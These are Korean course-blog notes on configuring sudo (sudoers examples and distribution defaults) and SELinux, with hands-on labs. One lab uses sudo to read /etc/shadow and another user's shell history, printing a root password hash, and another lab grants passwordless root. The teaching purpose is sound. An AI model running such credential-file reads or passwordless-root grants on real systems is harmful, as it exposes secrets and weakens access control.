Host_Alias CDROM = orion, perseus, hercules

# Cmnd alias specification

Cmnd_Alias DUMPS = /usr/bin/mt, /usr/sbin/dump, /usr/sbin/rdump,\

/usr/sbin/restore, /usr/sbin/rrestore

Cmnd_Alias KILL = /usr/bin/kill

Cmnd_Alias PRINTING = /usr/sbin/lpc, /usr/bin/lprm

Cmnd_Alias SHUTDOWN = /usr/sbin/shutdown

Cmnd_Alias HALT = /usr/sbin/halt

Cmnd_Alias REBOOT = /usr/sbin/reboot

Cmnd_Alias SHELLS = /usr/bin/sh, /usr/bin/csh, /usr/bin/ksh, \

/usr/local/bin/tcsh, /usr/bin/rsh, \

/usr/local/bin/zsh

Cmnd_Alias SU = /usr/bin/su

Cmnd_Alias PAGERS = /usr/bin/more, /usr/bin/pg, /usr/bin/less

sfecification

The User specification is the part that actually determines who may run what.

root ALL = (ALL) ALL

%wheel ALL = (ALL) ALL

We let root and any user in group wheel run any command on any host as any user.

FULLTIMERS ALL = NOPASSWD: ALL

Full time sysadmins (millert, mikef, and dowdy) may run any command on any host

without authenticating themselves.

PARTTIMERS ALL = ALL

Part time sysadmins (bostley, jwfox, and crawl) may run any command on any host

but they must authenticate themselves first (since the entry lacks the NOPASSWD

tag).

jack CSNETS = ALL

The user jack may run any command on the machines in the CSNETS alias (the

networks 128.138.243.0, 128.138.204.0, and 128.138.242.0). Of those networks,

only 128.138.204.0 has an explicit netmask (in CIDR notation) indicating it is a

class C network. For the other networks in CSNETS, the local machine's netmask

will be used during matching.

lisa CUNETS = ALL

The user lisa may run any command on any host in the CUNETS alias (the class B

network 128.138.0.0).

operator ALL = DUMPS, KILL, SHUTDOWN, HALT, REBOOT, PRINTING,\

sudoedit /etc/printcap, /usr/oper/bin/

The operator user may run commands limited to simple maintenance. Here, those

are commands related to backups, killing processes, the printing system, shutting

down the system, and any commands in the directory /usr/oper/bin/.

joe ALL = /usr/bin/su operator

The user joe may only su(1) to operator.

pete HPPA = /usr/bin/passwd [A-Za-z]*, !/usr/bin/passwd root

%opers ALL = (: ADMINGRP) /usr/sbin/

Users in the opers group may run commands in /usr/sbin/ as themselves with any

group in the ADMINGRP Runas_Alias (the adm and oper groups).

The user pete is allowed to change anyone's password except for root on the HPPA

machines. Note that this assumes passwd(1) does not take multiple user names on

the command line.

bob SPARC = (OP) ALL : SGI = (OP) ALL

The user bob may run anything on the SPARC and SGI machines as any user listed in

the OP Runas_Alias (root and operator).

jim +biglab = ALL

The user jim may run any command on machines in the biglab netgroup. sudo knows

that "biglab" is a netgroup due to the '+' prefix.

+secretaries ALL = PRINTING, /usr/bin/adduser, /usr/bin/rmuser

Users in the secretaries netgroup need to help manage the printers as well as add

and remove users, so they are allowed to run those commands on all machines.

fred ALL = (DB) NOPASSWD: ALL

The user fred can run commands as any user in the DB Runas_Alias (oracle or

sybase) without giving a password.

john ALPHA = /usr/bin/su [!-]*, !/usr/bin/su *root*

On the ALPHA machines, user john may su to anyone except root but he is not

allowed to specify any options to the su(1) command.

jen ALL, !SERVERS = ALL

The user jen may run any command on any machine except for those in the SERVERS

Host_Alias (master, mail, www and ns).

jill SERVERS = /usr/bin/, !SU, !SHELLS

For any machine in the SERVERS Host_Alias, jill may run any commands in the

directory /usr/bin/ except for those commands belonging to the SU and SHELLS

Cmnd_Aliases.

steve CSNETS = (operator) /usr/local/op_commands/

The user steve may run any command in the directory /usr/local/op_commands/ but

only as user operator.

matt valkyrie = KILL

On his personal workstation, valkyrie, matt needs to be able to kill hung

processes.

WEBMASTERS www = (www) ALL, (root) /usr/bin/su www

On the host www, any user in the WEBMASTERS User_Alias (will, wendy, and wim),

may run any command as user www (which owns the web pages) or simply su(1) to

www.

ALL CDROM = NOPASSWD: /sbin/umount /CDROM,\

/sbin/mount -o nosuid\,nodev /dev/cd0a /CDROM

Any user may mount or unmount a CD-ROM on the machines in the CDROM Host_Alias

(orion, perseus, hercules) without entering a password. This is a bit tedious

for users to type, so it is a prime candidate for encapsulating in a shell

script.

(2) Linux Distribution : /etc/sudoers file example

(KaliLinux 1.1.0) /etc/sudoers file example

#

# This file MUST be edited with the 'visudo' command as root.

#

# Please consider adding local content in /etc/sudoers.d/ instead of

# directly modifying this file.

#

# See the man page for details on how to write a sudoers file.

#

Defaults env_reset

기본 환경 변수 구성을 reset 한다.

Defaults mail_badpass

만약 암호를 정상적으로 입력하지 않으면 사용자에게 메일로 전송한다.

Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

sudo 명령어를 통해 실행할 모든 명령어의 PATH 변수를 지정한다.

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification

root ALL=(ALL:ALL) ALL

root 사용자는 시스템의 모든 명령어를 sudo 명령어를 사용하여 실행가능하다.

# Allow members of group sudo to execute any command

%sudo ALL=(ALL:ALL) ALL

sudo 그룹에 속한 사용자는 시스템의 모든 명령어를 sudo 명령어를 사용하여 실행가능하다.

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d

(centos 5.9) /etc/sudoers file example

## Sudoers allows particular users to run various commands as

## the root user, without needing the root password.

##

## Examples are provided at the bottom of the file for collections

## of related commands, which can then be delegated out to particular

## users or groups.

##

## This file must be edited with the 'visudo' command.

## Host Aliases

## Groups of machines. You may prefer to use hostnames (perhap using

## wildcards for entire domains) or IP addresses instead.

# Host_Alias FILESERVERS = fs1, fs2

# Host_Alias MAILSERVERS = smtp, smtp2

호스트 엘리어스 선언 부분

## User Aliases

## These aren't often necessary, as you can use regular groups

## (ie, from files, LDAP, NIS, etc) in this file - just use %groupname

## rather than USERALIAS

# User_Alias ADMINS = jsmith, mikem

사용자 엘리어스 선언 부분

## Command Aliases

## These are groups of related commands...

## Networking

#Cmnd_Alias NETWORKING = /sbin/route, /sbin/ifconfig, /bin/ping, /sbin/dhclient, /usr/bin/net, /sbin/iptables, /usr/bin/rfcomm, /usr/bin/wvdial, /sbin/iwconfig, /sbin/mii-tool

명령어 엘리어스 선언 부분

## Installation and management of software

#Cmnd_Alias SOFTWARE = /bin/rpm, /usr/bin/up2date, /usr/bin/yum

명령어 엘리어스 선언 부분

## Services

#Cmnd_Alias SERVICES = /sbin/service, /sbin/chkconfig

명령어 엘리어스 선언 부분

## Updating the locate database

#Cmnd_Alias LOCATE = /usr/bin/updatedb

명령어 엘리어스 선언 부분

## Storage

#Cmnd_Alias STORAGE = /sbin/fdisk, /sbin/sfdisk, /sbin/parted, /sbin/partprobe, /bin/mount, /bin/umount

명령어 엘리어스 선언 부분

## Delegating permissions

#Cmnd_Alias DELEGATING = /usr/sbin/visudo, /bin/chown, /bin/chmod, /bin/chgrp

명령어 엘리어스 선언 부분

## Processes

#Cmnd_Alias PROCESSES = /bin/nice, /bin/kill, /usr/bin/kill, /usr/bin/killall

명령어 엘리어스 선언 부분

## Drivers

#Cmnd_Alias DRIVERS = /sbin/modprobe

명령어 엘리어스 선언 부분

# Defaults specification

#

# Disable "ssh hostname sudo <cmd>", because it will show the password in clear.

# You have to run "ssh -t hostname sudo <cmd>".

#

Defaults requiretty

sudo 명령어를 수행할때 반드시 tty 사용하도록 설정한다.

(X) # ssh 172.16.9.252 sudo CMD

(0) # ssh -t 172.16.9.252 sudo CMD

#

# Refuse to run if unable to disable echo on the tty. This setting should also be

# changed in order to be able to use sudo without a tty. See requiretty above.

#

Defaults !visiblepw

기본적으로 password 입력이 보이지 않도록 설정

Defaults env_reset

기본 환경 변수 구성을 reset 한다.

Defaults env_keep = "COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR \

LS_COLORS MAIL PS1 PS2 QTDIR USERNAME \

LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION \

LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC \

LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS \

_XKB_CHARSET XAUTHORITY"

기존 사용자의 환경 변수를 불러와서 sudo 명령어로 새로운 명령어를 실행할때 새로 정의해서 사용하지 않고 그냥 사용한다.

## Next comes the main part: which users can run what software on

## which machines (the sudoers file can be shared between multiple

## systems).

## Syntax:

##

## user MACHINE=COMMANDS

##

## The COMMANDS section may have other options added to it.

##

## Allow root to run any commands anywhere

root ALL=(ALL) ALL

root 사용자는 시스템의 모든 명령어를 sudo 명령어를 사용하여 실행가능하다.

## Allows members of the 'sys' group to run networking, software,

## service management apps and more.

# %sys ALL = NETWORKING, SOFTWARE, SERVICES, STORAGE, DELEGATING, PROCESSES, LOCATE, DRIVERS

## Allows people in group wheel to run all commands

# %wheel ALL=(ALL) ALL

wheel 그룹에 속한 사용자는 시스템의 모든 명령어를 sudo 명령어를 사용하여 실행가능하다.

## Same thing without a password

# %wheel ALL=(ALL) NOPASSWD: ALL

wheel 그룹에 속한 사용자는 sudo 명령어 사용할때 암호를 물어보지 않는다.

## Allows members of the users group to mount and unmount the

## cdrom as root

# %users ALL=/sbin/mount /mnt/cdrom, /sbin/umount /mnt/cdrom

users 그룹에 속한 사용자는 "# mount /mnt/cdrom" 명령어를 수행할 수 있도록 설정한다.

## Allows members of the users group to shutdown this system

# %users localhost=/sbin/shutdown -h now

users 그룹에 속한 사용자는 "shutdown -h now" 명령어를 수행할 수 있도록 설정한다.

(CentOS 6.5) /etc/sudoers file example

## Sudoers allows particular users to run various commands as

## the root user, without needing the root password.

##

## Examples are provided at the bottom of the file for collections

## of related commands, which can then be delegated out to particular

## users or groups.

##

## This file must be edited with the 'visudo' command.

## Host Aliases

## Groups of machines. You may prefer to use hostnames (perhaps using

## wildcards for entire domains) or IP addresses instead.

# Host_Alias FILESERVERS = fs1, fs2

# Host_Alias MAILSERVERS = smtp, smtp2

호스트 엘리어스 선언

## User Aliases

## These aren't often necessary, as you can use regular groups

## (ie, from files, LDAP, NIS, etc) in this file - just use %groupname

## rather than USERALIAS

# User_Alias ADMINS = jsmith, mikem

사용자 엘리어스 선언

## Command Aliases

## These are groups of related commands...

명령어 엘리어스 선언

## Networking

# Cmnd_Alias NETWORKING = /sbin/route, /sbin/ifconfig, /bin/ping, /sbin/dhclient, /usr/bin/net, /sbin/iptables, /usr/bin/rfcomm, /usr/bin/wvdial, /sbin/iwconfig, /sbin/mii-tool

명령어 엘리어스 선언

## Installation and management of software

# Cmnd_Alias SOFTWARE = /bin/rpm, /usr/bin/up2date, /usr/bin/yum

명령어 엘리어스 선언

## Services

# Cmnd_Alias SERVICES = /sbin/service, /sbin/chkconfig

명령어 엘리어스 선언

## Updating the locate database

# Cmnd_Alias LOCATE = /usr/bin/updatedb

명령어 엘리어스 선언

## Storage

# Cmnd_Alias STORAGE = /sbin/fdisk, /sbin/sfdisk, /sbin/parted, /sbin/partprobe, /bin/mount, /bin/umount

명령어 엘리어스 선언

## Delegating permissions

# Cmnd_Alias DELEGATING = /usr/sbin/visudo, /bin/chown, /bin/chmod, /bin/chgrp

명령어 엘리어스 선언

## Processes

# Cmnd_Alias PROCESSES = /bin/nice, /bin/kill, /usr/bin/kill, /usr/bin/killall

명령어 엘리어스 선언

## Drivers

# Cmnd_Alias DRIVERS = /sbin/modprobe

명령어 엘리어스 선언

# Defaults specification

#

# Disable "ssh hostname sudo <cmd>", because it will show the password in clear.

# You have to run "ssh -t hostname sudo <cmd>".

#

Defaults requiretty

sudo 명령어를 수행할때 반드시 tty 사용하도록 설정한다.

(X) # ssh 172.16.9.252 sudo CMD

(0) # ssh -t 172.16.9.252 sudo CMD

#

# Refuse to run if unable to disable echo on the tty. This setting should also be

# changed in order to be able to use sudo without a tty. See requiretty above.

#

Defaults !visiblepw

기본적으로 password 입력이 보이지 않도록 설정

#

# Preserving HOME has security implications since many programs

# use it when searching for configuration files. Note that HOME

# is already set when the the env_reset option is enabled, so

# this option is only effective for configurations where either

# env_reset is disabled or HOME is present in the env_keep list.

#

Defaults always_set_home

HOME 변수 설정

Defaults env_reset

기본 환경 변수 구성을 reset 한다.

Defaults env_keep = "COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS"

Defaults env_keep += "MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE"

Defaults env_keep += "LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES"

Defaults env_keep += "LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE"

Defaults env_keep += "LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"

기존 사용자의 환경 변수를 불러와서 sudo 명령어로 새로운 명령어를 실행할때 새로 정의해서 사용하지 않고 그냥 사용한다.

#

# Adding HOME to env_keep may enable a user to run unrestricted

# commands via sudo.

#

# Defaults env_keep += "HOME"

Defaults secure_path = /sbin:/bin:/usr/sbin:/usr/bin

sudo 명령어를 통해 실행할 모든 명령어의 PATH 변수를 지정한다.

## Next comes the main part: which users can run what software on

## which machines (the sudoers file can be shared between multiple

## systems).

## Syntax:

##

## user MACHINE=COMMANDS

##

## The COMMANDS section may have other options added to it.

##

## Allow root to run any commands anywhere

root ALL=(ALL) ALL

root 사용자는 시스템의 모든 명령어를 sudo 명령어를 사용하여 실행가능하다.

## Allows members of the 'sys' group to run networking, software,

## service management apps and more.

# %sys ALL = NETWORKING, SOFTWARE, SERVICES, STORAGE, DELEGATING, PROCESSES, LOCATE, DRIVERS

## Allows people in group wheel to run all commands

# %wheel ALL=(ALL) ALL

wheel 그룹에 속한 사용자는 sudo 명령어를 사용하여 시스템의 모든 명령어 수행이 가능하다.

## Same thing without a password

# %wheel ALL=(ALL) NOPASSWD: ALL

wheel 그룹에 속한 사용자는 암호입력 없이 모든 명령어 수행이 가능하다.

## Allows members of the users group to mount and unmount the

## cdrom as root

# %users ALL=/sbin/mount /mnt/cdrom, /sbin/umount /mnt/cdrom

users 그룹에 속한 사용자는 "# mount /mnt/cdrom" 명령어 수행이 가능하다.

## Allows members of the users group to shutdown this system

# %users localhost=/sbin/shutdown -h now

users 그룹에 속한 사용자는 localhost에 대해서 "# shutdown -h now" 수행이 가능하다.

## Read drop-in files from /etc/sudoers.d (the # here does not mean a comment)

#includedir /etc/sudoers.d

(Ubuntu 8.04) /etc/sudoers file example

# /etc/sudoers

#

# This file MUST be edited with the 'visudo' command as root.

#

# See the man page for details on how to write a sudoers file.

#

Defaults env_reset

기본 환경 변수 구성을 reset 한다.

# Uncomment to allow members of group sudo to not need a password

# %sudo ALL=NOPASSWD: ALL

sudo 그룹에 속한 사용자는 시스템의 모든 명령어를 password 입력없이 수행이 가능하다.

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification

root ALL=(ALL) ALL

root 사용자는 시스템의 모든 명령어를 sudo 명령어를 사용하여 실행가능하다.

# Members of the admin group may gain root privileges

%admin ALL=(ALL) ALL

admin 그룹에 속한 사용자는 시스템의 모든 명령어를 sudo 명령어를 사용하여 실행가능하다.

3. sudo 실습

(주의) 실습시 주의 사항

실습은 CentOS 5.9 버전에서 실행하였다. 버전에 따라 /etc/sudoers 파일이 틀리므로 자신의 버전에 맞는 설정을 반드시 확인하여야 한다.

리눅스 배포판에 따라 /etc/sudoers 파일의 기본설정이 틀리므로 자신의 배포판 버전에 맞는 설정을 반드시 확인하여야 한다.

■ 사용시스템

- CentOS 5.9

[실습1]

실습 목표: 관리자(EX: root)와 동일한 레벨의 사용자를 생성한다.

(선수작업)

user01 ~ user03 사용자가 존재하여야 한다.

다음과 같은 명령어 형식을 사용하여 추가한다.

# useradd user01

# echo user01 | passwd --stdin user01

① /etc/sudoers 파일 편집

# visudo (# vi /etc/sudoers -> :wq!)

..... (중략) ....

## Same thing without a password

# %wheel ALL=(ALL) NOPASSWD: ALL

## Allows members of the users group to mount and unmount the

## cdrom as root

# %users ALL=/sbin/mount /mnt/cdrom, /sbin/umount /mnt/cdrom

## Allows members of the users group to shutdown this system

# %users localhost=/sbin/shutdown -h now

#

# (1) Sfecific configuration

#

user01 ALL=(ALL) ALL

-> /etc/sudoers 파일의 하단 부분에 위와 같은 내용을 추가한다.

② user01 사용자로 로그인하여 테스트

# ssh user01@localhost

user01 사용자로 로그인

$ sudo /sbin/shutdown +3 -h

[sudo] password for user01: (user01)

Broadcast message from root (pts/3) (Mon Sep 21 15:41:07 2015):

The system is going DOWN for system halt in 3 minutes!

Broadcast message from root (pts/3) (Mon Sep 21 15:41:07 2015):

The system is going DOWN for system halt in 3 minutes!

Shutdown cancelled.

-> 관리자가 수행할 수 있는 shutdown 명령어를 수행할 수 있는것으로 판단된다.

-> 실습에서는 실제 재부팅을 하지 않고 <CTRL + C> 수행한다.

$ exit

#

[실습2]

실습 목표: user01 사용자가 sudo 명령어 수행시 암호 입력없이 시스템 명령어를 수행할 수 있도록 변경한다.

① /etc/sudoers 파일 편집

# visudo (# vi /etc/sudoers -> :wq!)

..... (중략) .....

#

# (1) Sfecific configuration

#

[수정전]

user01 ALL=(ALL) ALL

[수정후]

user01 ALL=(ALL) NOPASSWD:ALL

-> 기존의 라인에 NOPASSWD 부분을 삽입한다.

② user01 사용자로 로그인하여 테스트

# ssh user01@localhost

user01 사용자로 로그인

$ sudo /sbin/shutdown +3 -h

Broadcast message from root (pts/3) (Mon Sep 21 15:49:56 2015):

The system is going DOWN for system halt in 3 minutes!

Broadcast message from root (pts/3) (Mon Sep 21 15:49:56 2015):

The system is going DOWN for system halt in 3 minutes!

Shutdown cancelled.

-> 암호 입력하는 화면이 나오지 않는다.

$ exit

#

[실습3]

실습 목표: 사용자가 접근 할 수 없는 파일(EX: /etc/shadow)을 접근 할 수 있는 사용자 설정을 한다.$ cat /etc/shadowcat: /etc/shadow: Permission denied

① /etc/sudoers 파일 편집

# visudo

..... (중략) .....

#

# (1) Sfecific configuration

#

user01 ALL=(ALL) NOPASSWD:ALL

user02 ALL=/bin/cat /etc/shadow, /bin/cat /home/user01/.bash_history

-> /etc/sudoers 파일의 하단 부분에 위와 같은 내용을 추가한다.

② user02 사용자로 로그인하여 테스트

$ ssh user02@localhost

user02 사용자로 로그인

$ cat /etc/shadow

cat: /etc/shadow: Permission denied

$ cat /home/user01/.bash_history

cat: /home/user01/.bash_history: Permission denied

$ sudo cat /etc/shadow

We trust you have received the usual lecture from the local System

Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.

#2) Think before you type.

#3) With great power comes great responsibility.

[sudo] password for user02: (user02)

root:$1$gRjk/iMP$rRLfVhiUKZLNkY/VjPLcg/:16799:0:99999:7:::

bin:*:16678:0:99999:7:::

daemon:*:16678:0:99999:7:::

adm:*:16678:0:99999:7:::

lp:*:16678:0:99999:7:::

sync:*:16678:0:99999:7:::

shutdown:*:16678:0:99999:7:::

..... (중략) .....

-> 정상적으로 잘 수행되는것으로 판단이 된다.

$ sudo cat /home/user01/.bash_history

..... (중략) .....

sudo /sbin/shutdown +3 -h

#1442818248

exit

#1442818431

cat /proc/sys/net/ipv4/ip_forward

#1442818438

exit

-> 정상적으로 잘 수행되는것으로 판단이 된다.

$ exit

#

[실습4]

실습 목표: 스크립트(EX: /etc/init.d/sshd)를 가지고 작업할수 있도록 설정한다.

① /etc/sudoers 파일 편집

# visudo

..... (중략) .....

#

# (1) Sfecific configuration

#

user01 ALL=(ALL) NOPASSWD:ALL

user02 ALL=/bin/cat /etc/shadow, /bin/cat /home/user01/.bash_history

user03 ALL=/etc/init.d/sshd

② user03 사용자로 로그인하여 테스트

# telnet localhost

user03 사용자로 로그인

$ /etc/init.d/sshd restart

rm: cannot remove `/var/run/sshd.pid': Permission denied [FAILED]

cp: cannot remove `/var/empty/sshd/etc/localtime': Permission denied

Starting sshd: /etc/ssh/sshd_config: Permission denied

[FAILED]

$ sudo /etc/init.d/sshd restart

We trust you have received the usual lecture from the local System

Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.

#2) Think before you type.

#3) With great power comes great responsibility.

[sudo] password for user03: (user03)

Stopping sshd: [ OK ]

Starting sshd: [ OK ]

$ exit

#

저작자표시 비영리 변경금지

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160805 Linux Kernel Parameter (0)	2016.08.05
20160804 ACL(Access Control List) (0)	2016.08.04
20160804 SELinux (0)	2016.08.04
20160803 SELinux (0)	2016.08.03
20160803 소프트웨어 관리 (0)	2016.08.03

Posted by 22Hz

, |

20160804 SELinux

모의해킹 침해대응 전문가 과정 / 2016. 8. 4. 16:41

(정리) 예제 : 웹서비스(httpd, /etc/httpd/conf/httpd.conf, 80)

데몬 이름 : /usr/sbin/httpd

주 설정 파일 : /etc/httpd/conf/httpd.conf

서비스 포트 : 80

웹 디렉토리 : /var/www/html

■ 새로운 서비스(EX: FTP)를 Open 하는 경우의 "서비스 Open 설정 절차"

(ㄱ) 소프트웨어 설치

# yum -y install httpd httpd-tools

(ㄴ) 서비스를 ON

# chkconfig httpd on

# service httpd start

(ㄴ) 방화벽에 서비스를 등록

# iptables -A INPUT -m state --state NEW -p tcp --dport 80 -j ACCEPT

# service iptables save /* /etc/sysconfig/iptables */

(ㄷ) SELinux 설정 설정

(서비스 boolean 설정)

# getsebool -a | grep httpd

-> audit messages (AVC denied 메세지를 확인)

-> 적당한 기능 on

(EX) # setsebool httpd_enable_homedirs on

# setsebool -P httpd_enable_homedires on

(서비스 데몬이 읽어 들이는 파일)

-> audit messages (AVC denied 메세지를 확인)

(EX) # mv /home/user01/index.html /var/www/html

# chcon -t httpd_sys_content_t /var/www/html/index.html

# semanage fcontext -a -t httpd_sys_content_t /var/www/html/index.html

[실습] 기타

# avcstat

lookups hits misses allocs reclaims frees

9001600 8979425 22175 22243 15440 21738

# seinfo

Statistics for policy file: /etc/selinux/targeted/policy/policy.24

Policy Version & Type: v.24 (binary, mls)

Classes: 81 Permissions: 235

Sensitivities: 1 Categories: 1024

Types: 3637 Attributes: 280

Users: 9 Roles: 12

Booleans: 217 Cond. Expr.: 257

Allow: 291046 Neverallow: 0

Auditallow: 123 Dontaudit: 226655

Type_trans: 33142 Type_change: 38

Type_member: 48 Role allow: 19

Role_trans: 308 Range_trans: 4521

Constraints: 90 Validatetrans: 0

Initial SIDs: 27 Fs_use: 23

Genfscon: 83 Portcon: 446

Netifcon: 0 Nodecon: 0

Permissives: 75 Polcap: 2

# seinfo -adomain -x

domain

sosreport_t

git_session_t

cfengine_execd_t

bootloader_t

netutils_t

qmail_tcp_env_t

devicekit_power_t

..... (중략) .....

piranha_web_t

user_screen_t

condor_master_t

greylist_milter_t

calamaris_t

staff_openoffice_t

mailman_queue_t

# seinfo -adomain -x | wc -l

670

# seinfo --permissive -x

Permissive Types: 75

nova_api_t

sblim_reposd_t

nova_compute_t

nova_console_t

openvswitch_t

nova_network_t

..... (중략) .....

vdagent_t

zarafa_ical_t

namespace_init_t

httpd_mediawiki_script_t

condor_schedd_t

condor_startd_t

condor_master_t

# seinfo --permissive -x | wc -l

77

# sesearch --role_allow -t httpd_sys_content_ /etc/selinux/targeted/policy/policy.24

Found 19 role allow rules:

allow system_r sysadm_r;

allow sysadm_r system_r;

allow sysadm_r staff_r;

allow sysadm_r user_r;

allow system_r guest_r;

allow logadm_r system_r;

allow system_r logadm_r;

allow system_r nx_server_r;

allow system_r staff_r;

allow staff_r logadm_r;

allow staff_r sysadm_r;

allow staff_r unconfined_r;

allow staff_r webadm_r;

allow unconfined_r system_r;

allow system_r unconfined_r;

allow system_r user_r;

allow webadm_r system_r;

allow system_r webadm_r;

allow system_r xguest_r;

# sesearch --allow | wc -l

291048

# sesearch --dontaudit | wc -l

226657

[실습] (GUI) system-config-selinux 툴 사용법

system-config-selinux 메뉴

■ 상태(Status)

■ 부울(Boolean)

■ 파일레이블링(File Labeling)

■ 사용자 맵핑(User Mapping)

■ SELinux사용자(SELinux User)

■ 네트워크포트(Network Port)

■ 정책모듈(Policy Module)

■ 프로세스도메인(Process Domain)

# system-config-selinux &

■ 상태(Status)

■ 부울(Boolean)

■ 파일레이블링(File Labeling)

■ 사용자 맵핑(User Mapping)

■ SELinux사용자(SELinux User)

■ 네트워크포트(Network Port)

■ 정책모듈(Policy Module)

■ 프로세스도메인(Process Domain)

■ SELinux 반드시 필요한가?

(예) 핸드폰

(예) 사물인터넷 기기와 제어용/모니터링 시스템

(예) 보안장비(EX: Firewall, IPS/IDS, WAF)

(예) IDC 센터의 메인 장비

(예) 공유기

■ SELinux을 설정을 어떻게 하는 것이 좋은가? (EX: 핸드폰)

Box 기법

-------------------

BOX(Software) <-- SELINUX

-------------------

OS(System Software) <-- SELINUX

-------------------

4. 참고 URL

SELinux on CentOS-6.4 - part 1/2

http://www.youtube.com/watch?v=5XzHQvtGfI4

SELinux on CentOS 6.4 - part 2/2

http://www.youtube.com/watch?v=BRXDotR0Mio

SELinux란?

http://www.ylabs.co.kr/index.php?document_srl=4030&mid=board_centos

[실습] SELinux 활용방법에 대한 조사(제한시간: 30분 + 문서작성: 30분)

SELinux에 대해 조사하고 발표한다.- 인터넷 자료를 검색- 신문기사를 검색- 논문을 검색- 기타

발표자료에는 주로 SELinux의 활용방법에 주로 중점을 둔다.(예) SELinux을 어디에 활용할수 있는가?

SELinux관련보고서_윤진식.hwp

저작자표시 비영리 변경금지

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160804 ACL(Access Control List) (0)	2016.08.04
20160804 Linux and Unix sudo command (0)	2016.08.04
20160803 SELinux (0)	2016.08.03
20160803 소프트웨어 관리 (0)	2016.08.03
20160802 웹 방화벽 (0)	2016.08.02

Posted by 22Hz

, |

22Hz

카테고리

달력

공지사항

태그목록

최근에 올라온 글

'모의해킹 침해대응 전문가 과정'에 해당되는 글 99건

20160823 Snort on CentOS6.X

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160823 DoS, DDoS, SNORT

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160822 DoS, DDoS, SNORT

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160822 NAS(Network Attached Storage)

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160819 프로젝트#4 + 피드백

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160805 Sophos UTM

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160805 Linux Kernel Parameter

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160804 ACL(Access Control List)

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160804 Linux and Unix sudo command

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160804 SELinux

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

최근에 달린 댓글

최근에 받은 트랙백

글 보관함

링크

티스토리툴바